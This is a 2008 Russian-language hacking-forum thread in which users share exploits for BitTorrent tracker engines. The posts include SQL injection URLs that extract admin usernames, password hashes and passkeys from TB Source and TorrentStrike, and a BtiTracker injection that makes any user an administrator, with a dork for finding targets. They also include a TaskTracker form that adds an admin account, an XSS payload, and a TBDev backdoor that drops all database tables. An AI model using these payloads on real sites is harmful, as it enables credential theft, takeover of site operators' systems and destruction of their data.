ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости движков трэкеров
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости движков трэкеров
  #1  
Старый 11.05.2008, 14:11
Аватар для z01b
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию Уязвимости движков трэкеров
Здесь выкладываем уязвимости трэкер-движков.

Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли.

TB Source <= 0.6

Код:
#######################################
# TB Source <= 0.6 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/tbsource/
# Vulnerable File : reqdetails.php
--------------------------------------------------


Vulnerability:

SQL-injection to obtain admin user and hash

http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

TorrentStrike <= 0.4

Код:
#######################################
# Torrent Strike <= 0.4 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/torrentstrike/
# Vulnerable File : reqdetails.php
--------------------------------------------------

SQL querry, for recieving admin user and hash(md5):

http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06
Последний раз редактировалось z01b; 11.05.2008 в 14:23..
 
Ответить с цитированием

  #2  
Старый 11.05.2008, 14:23
Аватар для z01b
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию
BtiTracker <=v1.4.1

Код:
#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]
TaskTracker all versions

Код:
<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]
 
Ответить с цитированием

  #3  
Старый 12.05.2008, 23:40
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию
TB Source
Код:
http://site/sendmessage.php?receiver=1&returnto=><script>alert('a')</script>
 
Ответить с цитированием

  #4  
Старый 14.05.2008, 22:40
Аватар для baltazar
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию
TBDev
Код:
<?

require_once("include/bittorrent.php");
dbconn();

if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
$drops = array();
$result = mysql_query("SHOW TABLES FROM ".$mysql_db."");
while (list($name) = mysql_fetch_array($result))
$drops[] = "`".$name."`";
die("DROP TABLE ".implode(", ", $drops));
echo "Drop tables complete...";
}

?>
расхешируеm 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string]
может путем запроса
http://tracker_url/drop.php?sd=[string]
удалить всю информацию из базы установленного трекера

Deflector
 
Ответить с цитированием

  #5  
Старый 16.05.2008, 23:15
Аватар для PandoraBox
PandoraBox
Постоянный
Регистрация: 06.05.2007
Сообщений: 393
Провел на форуме:
1510937

Репутация: 398
Отправить сообщение для PandoraBox с помощью ICQ
По умолчанию
Там двойной Md5, и уже пофиксено так что безпонтово
Последний раз редактировалось PandoraBox; 16.05.2008 в 23:24..
 
Ответить с цитированием

  #6  
Старый 17.05.2008, 22:44
Аватар для xgt.exe
xgt.exe
Новичок
Регистрация: 24.11.2007
Сообщений: 4
Провел на форуме:
13008

Репутация: 0
По умолчанию
Цитата:
Сообщение от baltazar  
TBDev
Код:
<?

require_once("include/bittorrent.php");
dbconn();

if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
$drops = array();
$result = mysql_query("SHOW TABLES FROM ".$mysql_db."");
while (list($name) = mysql_fetch_array($result))
$drops[] = "`".$name."`";
die("DROP TABLE ".implode(", ", $drops));
echo "Drop tables complete...";
}

?>
расхешируеm 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string]
может путем запроса
http://tracker_url/drop.php?sd=[string]
удалить всю информацию из базы установленного трекера

Deflector
А это разве не двойной???
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ